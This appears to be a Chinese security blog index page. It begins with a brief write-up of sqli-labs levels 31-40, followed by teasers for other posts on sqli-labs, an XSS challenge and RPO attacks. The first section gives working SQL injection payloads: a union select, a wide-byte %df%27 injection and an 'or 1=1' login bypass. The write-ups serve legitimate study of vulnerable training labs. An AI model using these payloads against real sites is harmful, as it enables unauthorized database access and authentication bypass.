sqli-libs 31-40 Write Up

Less-31:

看不透他在过滤些啥。。。感觉好像啥都没过滤

id=-1”)%20union%20select%201,2,database()%20%23

Less-32:

宽字节

payload:

id=-1%df%27%20union%20select%201,2,database()%20%23

Less-33:

上面的 payload 依旧还可用。。。

Less-34:

uname=admin�’ or 1=1#&passwd=admin

一个宽字节想考几遍。。。

Less-35 — Less40:

没意思,都是重复的payload,不发了。


sqli-labs 21-30 Write Up

Less-21:

依旧是 cookie 注入,只不过用 base64 编码了一下,也可以显注.

阅读更多
sqli-labs 11-20 Write Up

Less-11 — Less-15:

没啥意思,略了

阅读更多
sqli-labs 1-10 Write Up

前言:

咸鱼了一个多月没发博文了,期间猝死于期中考试、项目组互联网+创新创业比赛、以及天津旅游。现在终于又有短暂的开坑时间了。准备好好做一下 sqli-labs 的题目。并且在这个过程中尽量尝试各种 sqli 的奇技淫巧。尽可能多的学习姿势。

阅读更多
prompt(1) to win write up

前言

之前就断断续续的做过几次这个 xss 挑战,但是都半途而废了,这次终于决定利用这个假期把这个挑战做完,并且整理下来。

传送门:prompt(1) to win

阅读更多
从一道CTF题看懂RPO攻击原理

前言:

本来前几个星期就看了好几篇有关 RPO 攻击的文章,想抽空总结一下,但是觉得那几篇文章给出的例子都太生搬硬套,并不能让人很好的理解 RPO 攻击到底可以怎么用,给人一种 RPO 攻击很鸡肋的感觉。

直到看到了上周的强网杯 Web 题的 share your mind 的 write up,才让我有一种顿悟的感觉。不得不说这道题目质量非常的高,给了 RPO 攻击一个非常合理的利用环境。

于是借这道题目,详细分析一下有关 RPO 攻击的原理。

阅读更多